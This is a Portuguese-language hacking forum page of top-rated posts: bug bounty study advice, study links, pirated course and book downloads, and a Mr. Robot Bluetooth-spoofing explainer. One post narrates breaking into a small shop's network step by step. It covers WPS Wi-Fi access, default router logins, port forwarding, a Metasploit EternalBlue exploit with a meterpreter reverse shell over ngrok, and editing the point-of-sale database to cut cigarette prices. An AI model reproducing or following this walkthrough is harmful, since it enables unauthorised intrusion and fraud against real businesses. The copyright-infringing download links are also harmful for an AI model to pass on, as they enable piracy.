Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 08/21/18 in all areas

  1. 6 points
    Estamos aqui novamente rapaziada.... Hoje vamos falar sobre o que estudar para ser um bom caçador de bugs ou caçador de recompensas (COMO PREFERIR). Vamos primeiro desmistificar alguns mitos: 1- "BUG HUNTER É MAIS CAPACITADO DO QUE UM PENTESTER " /// Bug Hunter = Etical Hacker = Pentester. (WTFF?!?!?!?!?)) "Bug Hunter" é o termo dado para alguém que procura bugs em algum software em busca de recompensa (um pentester também, porém possui um tempo limitado e pode ser pago caso não encontre algo ) e ele utiliza as mesmas técnicas que um Pentester utiliza/utilizaria para realizar seu Teste de Intrusão. Existem SIM! Bug Hunters que são muito mais capacitados do que um Pentester, assim como também existe o contrário. 2- "VOU FAZER BUG PORQUE POIS DÁ MAIS DINHEIRO" /// Não é bem assim que funciona... Um Pentester pode ganhar bem mais do que um Bug Hunter, assim como o contrário. No caso de Bug Hunters, você recebe de acordo com a criticidade da vulnerabilidade (e onde) que você encontrou. O Pentester (se fizer parte de uma empresa) começará ganhando X e dependendo do seu desempenho poderá ganhar mais ou menos (). 3- "TAL BUG HUNTER TRABALHOU UMA NOITE E GANHOU $30.000" /// NÃO, NÃO E NÃO. Esse valor que foi pago, não foi por aquela semana/noite que ele passou procurando. Esse valor é fruto de todo conhecimento que foi adquirido ao longo do tempo que ele dedicou. 4- "POSSO SER BUG HUNTER E PENTESTER AO MESMO TEMPO" /// Sim, como já foi tido, Bug hunter nada mais é do que um pentester que realiza testes em busca de vulnerabilidades em softwares. Você pode sim ter um emprego na área de Segurança sendo um Pentester e fazer Bug Bounty no tempoo livre, tanto por diversão, quanto para aumentar sua renda. (). Você pode também ser aquele cara que sempre faz Bug Bounty, e além de caçar bugs nos programas das empresas, oferecer um serviço de Pentest para alguém. Bom, acho que os principais mitos foram falados, então vamos ao conteúdo. Já vimos que um Bug Hunter nada mais é do que um Pentester que busca bugs em empresas que possuem um programa de Bug Bounty. Então seguindo a lógica, podemos utilizar OS MESMOS CONTEÚDOS DE PENTEST para estudar, aprender, praticar e ir caçar seus bugs. Primeiro de tudo, o que seria de um Pentester sem as bases da segurança da informação? Não o CIDA, mas as bases que fazem com que a Segurança da Informação seja importante. Estou falando de Programação, Redes, Sistemas Operacionais, etc etc. E tendo esse princípio, iremos focar aqui no Pentest/Bug Bounty em Aplicações Web (no qual é o meu foco). Começando pela Programação, é difícil falar a você qual a melhor linguagem para ser estudada (JAVA NÃO É). O que eu recomendo é que você comece lá de baixo e ir evoluindo, dessa forma: HTML -> É interessante estudarmos HTML para entender como um site é estruturado, seus elementos, e também os tipos que ataque que o envolve. CSS -> Não muito diferente do HTML, é legal aprendermos pois o CSS hoje, nos possibilita utilizá-lo como vetor de ataque. Como exemplo deixo esse report de uma falha que utiliza o CSS como vetor de ataque => CSS Injection on /embed/ via bgcolor parameter leaks user's CSRF token and allows for XSS JAVASCRIPT -> Aqui, é extremamente importante que você conheça a fundo JavaScript, tanto pelos ataques que o envolvem, quanto pelos seus frameworks e plataformas que são criados e utilizados (criando muita força) tanto no Front-End quanto no Back-End. PHP -> Acho interessante estudar sobre pois ainda é altamente utilizado nos sites, por ser uma linguagem Server-Side, por ser fácil e por conter muito conteúdo na NET. SQL -> É essencial que seja aprendido o SQL devido ao fato de que quase todas as aplicações hoje utilizam algum banco de dados (relacional) para guardar suas informações. Python -> Recomendo o Python por ser uma linguagem muito fácil, poderosa e pode te ajudar bastante quando você precisar desenvolver alguma coisa rápida (claro que vai variar de programador para programador). XML -> Como assim XML??? Segue o mesmo princípio do HTML, você deve estudar para entender como determinados ataques funcionam, como por exemplo: XXE in Site Audit function exposing file and directory contents JAVA -> Por ser multiplataforma, e permitir que você decompile alguma biblioteca de forma mais fácil e legível para buscar vulnerabilidade como a que foi descoberta pelo João Matos (sou um grande fã) esse ano. CVE-2018-14667 Muitas outras tecnologias que existem, fica ao seu critério. Recomendo fortemente estudar as tecnologias que estão sendo utilizadas no site que você está procurando por vulnerabilidades. Um plugin que utilizo bastante para isso é o Wappalyzer. Partindo para Redes, é indispensável o conhecimento na área, pois você precisa entender como a internet funciona, como as aplicações se comunicam, como os protocolos conversam, quais regras são utilizadas etc. Protocolos de Transmissão como TCP/UDP -> É necessário ter conhecimento da base da internet, como os dados são trafegados e entreges etc. Protocolos de Aplicações (SSH, Telnet, HTTP) -> Toda aplicação utiliza algum protocolo para se comunicar, são inúmeros e cada um com suas devidas regras. Em especial, recomendo estudar fortemente o procotolo HTTP, pois ele possui diversos métodos, diferentes versões, e inúmeros Headers que você precisa entender como funcionam para tirar proveito e utilizar como vetores de ataque. Todos os outros assuntos que envolvem redes são bem vindos, pois dependendo da aplicação que você irá testar, você precisará entender como o protocolo dessa aplicação funciona. Indo pro último, mas não menos importante são os Sistemas Operacionais. Linux -> É essencial que você tenha conhecimentos relacionados ao sistema operacional do pinguim, pois é fortemente utilizado em servidores, e dependendo de cada distribuição, algumas coisas podem mudar. É muito importante que você entenda como funciona cada sistema operacional, pois haverá situações nas quais você poderá ter acesso à algum e precise de seus conhecimentos para realizar determinada ação. Windows (IMAGINEM QUE O EMOTICON É UMA JANELA. "ABSTRAÇÃO") -> Máquinas com esse sistema operacional também são utilizadas em diversos servidores espalhados ao redor do mundo, não diferente do Linux, você deve entender como funciona o sistema para conseguir realizar determinadas funções que sejam necessárias para dar continuidade ao seu Bounty. FreeBSD -> FreeBSD ainda é utilizado para servidores, e como os outros sistemas descritos, você precisará entender como ele funciona. PRATIQUE CTF, LEIA REPORTS, LEIA WRITEUPS, TUDO ISSO PODERÁ AJUDAR VOCÊ A DESENVOLVER SEU MINDSET. Após pesquisar em vários lugares (fórum do BugCrowd) resolvi colocar aqui materiais para que vocês possam estudar e começarem a fazer seus programas de Bug Bounty. LIVRO (Inglês) -> The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (Dafydd Stuttard,‎ Marcus Pinto) OBS: eu traduzi ele por completo, se quiserem eu passo o link para vocês. LIVRO (Português) -> Testes de Invasão - Uma Introdução Prática ao Hacking (Georgia Weydman) LIVRO (Português) -> Pentest em Aplicações Web (Daniel Moreno) LIVRO (Inglês) -> Owasp Testing Guide (Owasp) LIVRO (Inglês) -> Web Hacking 101 - How to Make Money Hacking Ethically (Peter Yaworski) CURSO (Inglês) -> Hacker101 (HackerOne) CURSO (Inglês) -> Bugcrowd University (BugCrowd) WRITEUP DAS FALHAS EXPLICADAS (Inglês) -> Pentester Land REPORTS DIVULGADOS (Inglês) -> HackerOne CANAL NO TELEGRAM SOBRE REPORTS (Inglês) -> Bug Bounty Channel BOT DE DIVULGAÇÃO DE RELATÓRIOS (Inglês) -> Public Disclosure Bot PAPERS SOBRE CTF/BUGBOUNTY (Português) -> Hackaflag Papers - Hackaflag Academy Bom galera, acho que por hoje é só. Espero que tenha despertado o interesse em vocês. Qualquer dúvida, sugestão, correção, discussão, se você não concorda em alguma coisa deixa aí nos comentários, tudo é bem-vindo !!!!
  2. 5 points
    E ae galera, trago pra vocês uns materiais para estudo. Nada de apostila, tudo pela internet. Eu peguei o básico do básico e reuni. Não precisa estudar todo dia, toda hora, estudem quando tiver vontade. É serio, uma hora você vai falar "agora eu vou estudar", espere esse momento chegar. Eu segui dessa seguinte maneira: GNU/Linux > Redes > Programação > Hacking. Vamos lá. No nosso repositório você encontra de tudo, todo tipo de material. Link do nosso repositório http://pc.cd/VfbotalK Senha: issonaoehumasenha5/9 INTRODUÇÃO AO GNU/Linux INTRODUÇÃO -> https://goo.gl/Sjih4K CURSO GNU/Linux -> https://goo.gl/SlZgwD DOMINANDO O TERMINAL -> https://goo.gl/Ka6Uu1 A ARVORE DE DIRETÓRIO DO LINUX -> https://goo.gl/g5SmeI INTRODUÇÃO AO BÁSICO DO BÁSICO DE REDES: TCP/IP -> https://goo.gl/XPNEH9 UDP -> https://goo.gl/1M5SYF DIFERENÇA DE TCP E UDP -> https://goo.gl/j0MtY0 HUB, SWITCH, ROTEADOR E MODEM -> https://goo.gl/SAQbkI BRIDGE -> https://goo.gl/Wu4hcj NAT -> https://goo.gl/c8NjHH DNS -> https://goo.gl/bsMdUR GATEWAY -> https://goo.gl/OFOkkZ DHCP -> https://goo.gl/5gnZrc LISTA DE PROTOCOLOS DE REDES -> https://goo.gl/EJ1YvZ CURSO DE REDES -> https://goo.gl/XijVVc INTRODUÇÃO A PROGRAMAÇÃO LOGICA DE PROGRAMAÇÃO -> https://goo.gl/9GNGHs PYTHON -> https://goo.gl/xkzYkk C -> https://goo.gl/KYgUKn C# -> https://goo.gl/C4zvN0 C++ -> https://goo.gl/HuhBSs PHP -> https://goo.gl/LymDBl RUBY -> https://goo.gl/kgcA1g JAVA -> https://goo.gl/q0sGmN HACKING SOU INICIANTE, QUERO SER HACKER, POR ONDE COMEÇO -> https://goo.gl/TiM39Y OS PRIMEIROS PASSOS DE UM HACKER INICIANTE -> https://goo.gl/BLIM5k COMO SER UM HACKER DE SUCESSO -> https://goo.gl/QrgQjW COMO FUNCIONAM OS CYBER ATAQUES PARTE 1 -> https://goo.gl/55SDY4 COMO FUNCIONAM OS CYBER ATAQUES PARTE 2 -> https://goo.gl/QYaRHc KOSHIMARU KISARA - INTRODUÇÃO AO CURSO HACKER -> https://goo.gl/2rl55d CAVEIRATECH - INTRODUÇÃO AO HACKING E PENTEST -> https://goo.gl/KsTfvw ANONIMATO -> Anonsurf: https://goo.gl/vEyWOu && Whonix: https://goo.gl/VSajTM CANAIS COM CONTEUDO DE TECNOLOGIA/HACKER -> https://goo.gl/TB4px8
  3. 4 points
    Estou de volta com os desafios! Quem quiser participar, aprender, brincar... Chega junto! https://desafio-fsociety.webcindario.com
  4. 4 points
    Aqui tem varios cursos incluindo 137 cursos da Alura Bons estudos http://listaodownloadcursos.blogspot.com/ Alguém tem o duplique seu salario Seiti Arata?
  5. 3 points
    Curso de PHP do Zero ao Profissional - Bonieky Lacerda‎ Tamanho Total: 21.3 GB Formato dos Arquivos: MP4/M4V Links: Parte 1:Download Parte 2: Download Parte 3:Download *Caso alguns videos não executar instale o K-Lite codec*
  6. 3 points
    Dicionário Hacker. Créditos TheCyberTeam DicionarioHacker(TheCybersTeamv1.1).pdf
  7. 3 points
    Um fodendo Pack de livros sobre Psicologia e Psicanálise https://mega.nz/#F!UCIjka7K!adIUwh8jClw9uPjTH34YkA
  8. 2 points
    Bom dia pessoal! Tenho 21 anos e como iniciante em programação gostaria de obter algumas respostas. Vou direto ao ponto. Sendo programador você também é um hacker? Se sim, qual linguagem usa-se normalmente? Já ouvi falar que Python, php são fundamentais mas como dito anteriormente sou iniciante. Claro que isso se possível tem que ser muito bom e depois de manjar em programação tenho que estudar pentest.. enfim, obrigado desde já.
  9. 2 points
    Olá venho mostrar como fiz para entrar no computador do mercadinho remotamente, foi o primeiro passo antes deu alterar o preço do cigarro para 4 reais (antes era R$ 8,50 ja faz 5 dias e nada foi alterado ), Passos: Entrar na rede Mapear a rede & encontrar o caixa Encontrar vulnerabilidades Redirecionar portas do caixa para WAN Invaindo o caixa Passo 1 Como voce não vai poder simplesmente se conectar a LAN , o padrão é tentar fazer uma conexão por Wi-fi, no meu caso a rede tinha WPS ligado, então usando o WPS App para encontrar o pin da rede para que eu possa conectar, voce pode usar varias ferramentas para tentar fazer ter conexao num wifi, Passo 2 Utilizei um app chamado Network Scanner para fazer uma varredura na rede, com isso você pode pegar cada dispositivo conectado a rede, procure por computadores na rede, no meu caso só existe 1 caixa no mercadinho e com isso foi facil descobrir qual dos hosts era e lembre-se reconhecer o sistema que está rodando, se for Windows você tem mais chances de conceguir, aproveite e pegue também o endereço do Gateway no caso: 192.168.1.1 //Simulaçao Passo 3 Ainda no Network Scanner, verifique as portas do computador , verifique se existe alguma porta vulneravel, no meu caso a 445 pode ser vulneravel ao terrivel EternalBlue e como o mercado não é muito grande provavelmente não fazem atualizaçao o sistema no sistema, oque pode ser um error fatal não deixar seu sistema atualizado, Passo 4 Entre no navegador e entre no gateway (Geralmente 192.168.1.1 ou 192.168.0.1), provavelmente irá pedir login ou senha, você pode tentar usar o routersploit no android para poder encontrar o login e senha do roteador, mas você pode fazer testes rapidos em logins padroes (Lista abaixo) , assim que conceguiu acesso ao roteador você precisa liberar portas para o ip do caixa (lembre de redirecionar para o IP do caixa) geralmente uma pagina chamada Port Forwarding, achou? entao adicionar uma nova regra e Porta Publica (Public Port) use portas entre 1001-9999 pois a maioria dos scanners de portas scaneia de 1-1000 e em Porta Privada (Private Port) voce irá colocar a porta que se encontra uma possivel vulnerabilidade no meu caso 445 e no protocolo (protocol) voce coloca TCP , e aumentar a chance nenhuma outra pessoa achar esse caminho, caso tenho dificuldades para liberar portas no roteador aproveite a internet gratis e pesquisa como abrir portas usando o modelo do roteador (que pode ser facilmente encontrado fusando no painel) Logins padrao: admin admin admin (SENHA EM BRANCO) admin gvt12345 guest guest Passo 5 Antes de ir embora para casa aproveite e pegue o IP WAN da rede, facilmente encontrado no site: MyIP org ou MeuIP br, em casa já com o café do lado, abra um bloco de notas e grave suas informaçoes nela ex: 164.216.21.3:4444 -> 192.168.1.21:445, bom vamos ver se realmente é vulneravel ao ataque do eternalblue , abra o metasploit e use smb_ms17_010 para checar se é vulneravel, exemplo do meu caso: RHOSTS: 164.216.21.3 RPORT: 4444 comandos abaixo. msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 164.216.21.3 set RPORT 4444 exploit caso o retorno ter Host is likely VULNERABLE to MS17-010! é vulneravel como no meu caso abaixo: [+] 164.216.21.3:4444 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 164.216.21.3:4444 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Boa agora vamos explorar essa vulnerabilidade use o exploit windows/smb/ms17_010_eternalblue para invadir, no meu exemplo irei usar o ngrok para fazer tunnel com o meu localhost (APRENDA USAR O NGROK AQUI ) utilizarei o payload windows/meterpreter/reverse_http use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 164.216.21.3 set RPORT 4444 set LHOST 0.tcp.ngrok.com set LPORT 46707 exploit Pronto, agora estude o computador, meus passos para alterar o banco de dados: Naveguei até a area de trabalho, verifiquei todos os links, e vi que tinha um chamado Sis comerce, baixei o executavel dele, decompilei ele com o .NET Reflector, verifiquei que ele faz conexão com o banco de dados da Microsoft SQL Server, usando o mono desenvolvi uma ferramenta para conectar no banco usando os dados que decompilei (Existe uma classe conectora do DB contendo host, user...) só apliquei a mesma coisa no mono, simplesmente atualizei o preço de todos os produtos com o nome "CIGARRO DE PALHA MINAS" para 4.00. Videos que podem ajudar:
  10. 2 points
    Fiz um vídeo sobre o onionscan, explicando a teoria e a prática da ferramenta. Abre e da like, 50 faço continuação.
  11. 2 points
    bom no momento em que vc faz a conexao vc ja ta requisitando um pacote entao isso e basicamente a mesma coisa o que muda e o tipo de pacote que vc vai envia se vai ser tcp udp SYN...
  12. 2 points
    Curso de Inglês Mairo Vergara 4.0 24 Módulos Tipo de arquivo: Torrent Tamanho do arquivo Torrent: 309.64KB Tamanho do arquivo baixado: 23.1GB Servidor: MEDIAFIRE LINK: DOWNLOAD *Aguarde 5 segundos e feche a propaganda* Tem Bastante seeds aproveitem! Se o link estiver OFF, avise nos comentários!
  13. 2 points
    Cerca de 29GB de dados no site do Wikileaks. https://file.wikileaks.org/file/ https://file.wikileaks.org/torrent/
  14. 2 points
    Já dei inicio ao projeto, segue o LINK DA PLAYLIST. Espero ajudar, quem queira !
  15. 2 points
    https://drive.google.com/drive/folders/0BzaTvtY-IGcpekJGYUwyZ09MRHM
  16. 2 points
    A conta fica logada por que sua sessão fica aberta no servidor deles. Não há armazenamento das credenciais na sua máquina a não ser que você escolha salvar naquela "caixa de mensagem" ou esteja com algum keylogger.
  17. 2 points
    Bem vindo. É muito bom você aprender sobre tudo mas sugiro que foque em algo pois no que focar vai ser seu ponto mais forte. Com o tempo você fica bom em tudo mas se torna especialista em algo.
  18. 2 points
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  19. 2 points
    Salve rapeize, tudo na paz? Ando um pouco offline, mas estes dias achei uma apostila bem legal sobre testes de invasão em redes wireless e achei que pudesse ser útil pra vocês. Pic Chamativa. Link para ver online: https://docslide.com.br/documents/teste-de-invasao-em-redes-sem-fio-80211.html O link para download está em anexo ao tópico. docslide.com.br_teste-de-invasao-em-redes-sem-fio-80211.pdf
  20. 2 points
    Podem me chamar pelo meu nick. Estou aqui para fazer amigos e permutar conhecimentos. Sou estudante de Redes de Computadores e termino este ano... Bem, vamos ser amigos? ;)
  21. 2 points
    SERVIDOR: GOOGLE DRIVE ---------------------------MATEMÁTICA--------------------------- Cálculo - James Stewart vol1. e vol.2 Com pdf das resoluções LINK:Download Curso de Cálculo - Guidorizzi vol1 Curso de Cálculo - Guidorizzi vol2 Curso de Cálculo - Guidorizzi vol3 Curso de Cálculo - Guidorizzi vol4 LINK:Download Cálculo A - Diva Fleming .Ed.6 LINK:Download Livro - Cálculo com Geometria Analítica - Leithold e soluções em pdf LINK:Download Cálculo - George Thomas vol.1 Cálculo - George Thomas vol.2 LINK:Download Livro - Introdução a Álgebra Linear - Alfredo Steinbruch e Paulo Winterle LINK:Download Livro - Álgebra Linear Boldrini LINK:Download Livro - Álgebra Linear - Alfredo Steinbruch LINK:Download Pré-Cálculo Demana LINK:Download Fundamentos de Matemática Elementar - Vol. 7 - Geometria Analítica {Exercícios resolvidos Exercícios propostos com resposta} LINK:Download Geometria Analítica - Steinbruch e Winterle {297 Exercícios propostos 82 Exercícios resolvidos} LINK:Download Fundamentos de Matemática Elementar - Vol. 5 - Combinatória e probabilidade {Exercícios resolvidos Exercícios propostos com resposta} LINK:Download Pré-Calculo Paulo Boulos LINK:Download Fundamentos de Matemática Elementar - Vol.10 - Geometria Espacial LINK:Download Fundamentos de Matemática Elementar - Vol. 9 - Geometria Plana {41 exercicios resolvidos 971 exercícios propostos com resposta 373 testes de vestibulares com resposta} LINK:Download Earl Swokowski - Cálculo com Geometria Analítica - Vol. 1 - 2ª Edição LINK:Download Calculus Made Easy Thompson LINK:Download Calculus - Spivak LINK:Download Calculo Diferencial e Integral Vol 1 - N. Piskounov LINK:Download Cálculo - Análise Matemática - Demidovitch LINK:Download Cálculo Diferencial e Integral de Funções de Várias Variáveis (Diomara Pinto e Maria Cândida F. Morgado) - 3ª edição LINK:Download Cálculo 1 para leigos LINK:Download Cálculo 2 para leigos LINK:Download Tom Apostol - Calculus vol1 e vol2 (Inglês) + Soluções LINK:Download Curso de Álgebra Linear - Fundamentos e Aplicações - Goldfeld Cabral LINK:Download Geometria analítica e Álgebra linear - Elon Lages LINK:Download Álgebra Linear e Aplicações - Callioli LINK:Download Álgebra Linear, Elon Lages Lima LINK:Download Algebra Linear - Hoffman e Kunze LINK:Download Cálculo Volume 1 e Volume 2 (Com resoluções) - Howard Anton, Irl Bivens, Stephen Davis - 8ª Edição LINK:Download Granville - Elementos do Cálculo LINK:Download Cálculo Um Curso Moderno e Suas Aplicações - Hoffmann e Bradley LINK:Download Pré-Cálculo para Leigos LINK:Download Equações Diferenciais - com Aplicações em Modelagem - Dennis G. Zill LINK:Download Equações Diferenciais Vol. 1 e Vol. 2 - Dennis G. Zill e Michael R. Cullen LINK:Download Equações Diferenciais Dennis G.Zill LINK:Download Equações Diferenciais - Coleção Schaum LINK:Download Abramo Hefez - Curso de Álgebra Vol 1 e Vol 2 LINK:Download Elementos de Álgebra - Arnaldo Garcia & Yves Lequain LINK:Download Elementos de Aritmética - Abramo Hefez LINK:Download Introdução a Teoria Dos Números - Jose Plinio de Oliveira LINK:Download Introdução a Álgebra Abstrata LINK:Download Morettin e Bussab - Estatística Básica 6ed LINK:Download Probabilidade um curso moderno com aplicações 8ed Ross LINK:Download Introdução Teoria Da Probabilidade - Hoel Port Stone LINK:Download Estatística Básica - A Arte de Trabalhar com Dados LINK:Download Geometria Analítica - Reis e Silva - Ed2 LINK:Download Geometria vol 1 e 2 Morgado LINK:Download Vetores e Geometria Analítica - Paulo Winterle LINK:Download Matemática Discreta Coleção Schaum 2ed - Seymour Lipschutz e Marc Lipson LINK:Download Análise Combinatória e Probabilidade - Morgado LINK:Download Problemas e Exercícios de Análise Matemática - Demidovitch LINK:Download Principles of Mathematical Analysis Walter Rudin (Inglês) E (Espanhol) LINK:Download Análise Real vol.1, 2 e 3 (Elon Lages Lima) Com soluções do vol.1 LINK:Download ---------------------------FÍSICA-------------------------- Curso de Física Básica - Moyses - 1ª Ed. - Vol. 1 - Mecânica Curso de Física Básica - Moyses - 4ª Ed. - Vol. 2 - Fluídos, osilações e ondas calor Curso de Física Básica - Moyses - 1ª Ed. - Vol. 3 - Eletromagnetismo Curso de Física Básica - Moyses - 1ª Ed. - Vol. 4 - Ótica, Relatividade e Física Quântica LINK:Download Física 1 - Young e Freedman - Mecânica - 12ªed Física 2 - Young e Freedman - Termodinâmica e ondas - 12ªed Física 3 - Young e Freedman -Eletromagnetismo - 12ªed Física 4 - Young e Freedman - Ótica e Física moderna - 12ªed (Com soluções) LINK:Download Fundamentos de Física 9ª Edição Vol 1 - Halliday - Mecânica Fundamentos de Física 9ª Edição Vol 2 - Halliday - Gravitação, ondas e termodinâmica Fundamentos de Física 9ª Edição Vol 3 - Halliday - Eletromagnetismo Fundamentos de Física 9ª Edição Vol 4 - Halliday - Óptica e Física moderna (Com soluções) LINK:Download Os Fundamentos da Física - Vol. 1 - - Mecânica - 9ªEd. RAMALHO Os Fundamentos da Física - Vol. 2 - - Termologia, óptica e ondas - 9ªEd. RAMALHO Os Fundamentos da Física - Vol. 3 - - Eletricidade, introdução a Física moderna e Análise dimensional - 9ªEd. RAMALHO (Com soluções) LINK:Download ópicos de Física - Mecânica - Vol 1 - Helou, Gualter e Newton Tópicos de Física - Termologia, Ondulatória e Óptica - Vol 2 - Helou, Gualter e Newton Tópicos de Física - Eletricidade, Física Moderna e Análise Dimensional - Vol 3 - Helou, Gualter e Newton (Com soluções) LINK:Download Curso de Física Vol 1, 2 e 3 - Antônio Máximo e Beatriz Alvarenga LINK:Download Lições de Física de Feynman - Vol1, 2, 3 e 4 LINK:Download
  22. 2 points
    Recomendo a documentação da linguagem, pois muitos livros PDF em pt-br estão desatualizados, a não ser que saiba inglês aí terá bastante Pode baixar a documentação em pt-br no site do PHP http://php.net/download-docs.php
  23. 2 points
    Salve rapaziada queria saber como faço para derrubar uma conexão bluetooth, por exemplo eu tenho um cara conectado em uma caixa de som bluetooth e queria desconectar ele e me conectar desde já agradeço quem ajudar .
  24. 2 points
    E ae galera gostei bastante do fórum pois esclareceu algumas dúvidas e aqui estou pra também colaborar
  25. 2 points
    Qual o procedimento pra ficar rico sem trabalhar?
  26. 2 points
    Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking Hackear WhatsApp... Um tema, peculiar, não? A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa... Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria? - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..." Pois é meu querido... Tem como! Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login. Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp. Veja como:
  27. 2 points
    Ladies and Gentlemen, é com enorme prazer que lhes apresento a nossa nova campanha de criação de conteúdo. Vamos sortear 1 camiseta ao final de cada mês para os membros que mais criaram conteúdo em nosso Fórum, a fim de incentivar a comunidade a criar mais conteúdo e divulgar os eventos da cultura hacker pelo nosso país. Abaixo segue o primeiro modelo que sortearemos, é uma camiseta da comunidade Inurl Brasil, como no modelo abaixo.
  28. 2 points
    Esses são alguns PDFs sobre engenharia social que eu li, e queria compartilhar com vocês ENGENHARIA SOCIAL O FATOR HUMANO NA SEGURANÇA DA INFORMAÇÃO. .pdf Prevenção para ataques de engenharia social.pdf Técnicas de Engenharia Social .pdf Engenharia social (segurança da informação).pdf ENGENHARIA SOCIAL O ELO MAIS FRÁGIL DA SEGURANÇA NAS EMPRESAS .pdf
  29. 2 points
    Github https://github.com/gordonrs/thc-secure-delete
  30. 1 point
